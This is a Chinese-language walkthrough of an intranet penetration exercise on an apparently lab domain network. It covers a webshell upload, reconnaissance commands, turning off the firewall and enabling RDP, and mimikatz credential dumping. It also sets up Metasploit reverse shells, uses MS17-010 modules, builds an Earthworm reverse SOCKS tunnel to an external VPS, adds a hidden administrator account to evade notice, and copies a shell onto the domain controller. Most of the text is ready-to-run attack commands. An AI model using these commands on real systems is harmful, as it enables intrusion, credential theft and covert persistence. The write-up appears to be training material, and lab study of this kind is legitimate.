网络配置
Windows server 2008:VMnet1(仅主机模式),192.168.52.138
Windows 7 x64:VMnet1(仅主机模式),192.168.52.143
VMnet8(NAT), 192.168.192.130
kali:VMnet8(NAT),192.168.192.135
探测外网漏洞
访问外网的win7服务器,直接扫描目录
在beifan.rar中可以发现使用的yxcsm,
查询yxcms的相关漏洞,可以轻松的找到文件上传漏洞
上传的文件位置如下
而另一个目录phpmyadmin
可以用root/root弱口令登录
这里不多赘述,本篇主要学习的是内网渗透的操作
进入内网
信息搜集
上传冰蝎马,拿到webshell后首先进行的是内网的信息收集
命令如下
netstat -ano 显示本机的IP和端口号,通信对象的IP地址和端口号
nmap -sU --script nbstat.nse -p137 c段 -T4 使用nmap进行存活主机探测
net user 查看本机用户列表
net localgroup administrators 本机管理员
query || qwinsta 查看当前在线用户
ipconfig /all 查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group "domain admins" /domain 查看域管理员的名字
net group "domain computers" /domain 查看域中的其他主机名
net group "doamin controllers" /domain 查看域控制器(可能有多台)
netstat -ano | find "3389" 查看3389端口是否开启,若开启可以尝试远程桌面登录(Windows)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 用于开启远程桌面登录
netsh firewall show config 查看防火墙状态
关闭防火墙
netsh firewall set opmode disable Windows Server 2003 系统及之前版本
netsh advfirewall set allprofiles state off Windows Server 2003 之后系统版本
mstsc 远程桌面连接
探测存活主机
查看防火墙状态,以及关闭防火墙
查看3389端口状态,并开启
尝试远程登录,但在这之前需用mimikatz获取密码,有两种方式
-
MSF反弹shell
kali开启监听
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload php/meterpreter/reverse_php payload => php/meterpreter/reverse_php msf exploit(multi/handler) > show options
利用冰蝎发起连接
开启虚拟终端
上传并运行mimikatz
我这里不知道为什么总是连不上,所以我直接使用冰蝎自带的虚拟终端
-
冰蝎虚拟终端
得到密码hongrisec@2018,进行远程连接
横向移动
上传fscan到服务器,并运行
探测到内网三个ip
192.168.52.141
192.168.52.143
192.168.52.138
为了使msf对内网环境路由可达,需要用msf添加路由
meterpreter > run autoroute -s 192.168.52.0/24 查看路由
meterpreter > run autoroute -p 添加路由
再进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.141
run
发现漏洞
使用脚本攻击
exploit/windows/smb/ms17_010_psexec
set rhost 192.168.52.141
set lhost 127.0.0.1
set lport 4444
但是没有攻击成功
没关系,之后我们可以尝试直接打开该主机的远程桌面,由于该主机处于内网,我们的攻击机相对之处于外网,无法直接与内网中的主机通信,所以我们需要用Earthworm做Socks5代理作为跳板进入内网获取更多主机。
首先将ew_for_linux64上传至vps中,用于监听内网环境传来的流量(ps.这里需要对文件进行提权)
chmod +x ew_for_linux64
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
该命令的意思是添加一个转接隧道,监听8888,把本地1024端口收到的代理请求转交给1080端口,这里1024端口只是用于传输流量。
相当于内网连接vps的8888端口,
ew_for_Win.exe -s rssocks -d 47.93.248.221 -e 8888
既让要连接内网和kali攻击机,需要再kali上配置对vps连接
这里使用proxychain
配置proxychains代理链的配置文件
vim /etc/proxychains4.conf
将代理设置成 vps-IP 的1080端口:socks5 vps-IP 1080
先用auxiliary/admin/smb/ms17_010_command来添加一个用户
创建用户
set command 'net user chenghao$ chenghao@123 /add' # 带$代表创建隐藏用户,为的是不让目标发现咱们
set rhosts 192.168.52.141
run
提升权限
set command net localgroup administrators chenghao$ /add
run
开启远程桌面服务
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
开启端口后远程连接
至于最后的域控,端口打不开,使用c盘共享
net use \\192.168.52.138\c$ "Liu78963" /user:"administrator"
使用dir 就可以查看域控的资源了。
将win7主机上的shell.exe上传到域控上
copy c:\phpstudy\www\yxcms\shell.exe \\192.168.52.138\c$
制定计划任务定时执行shell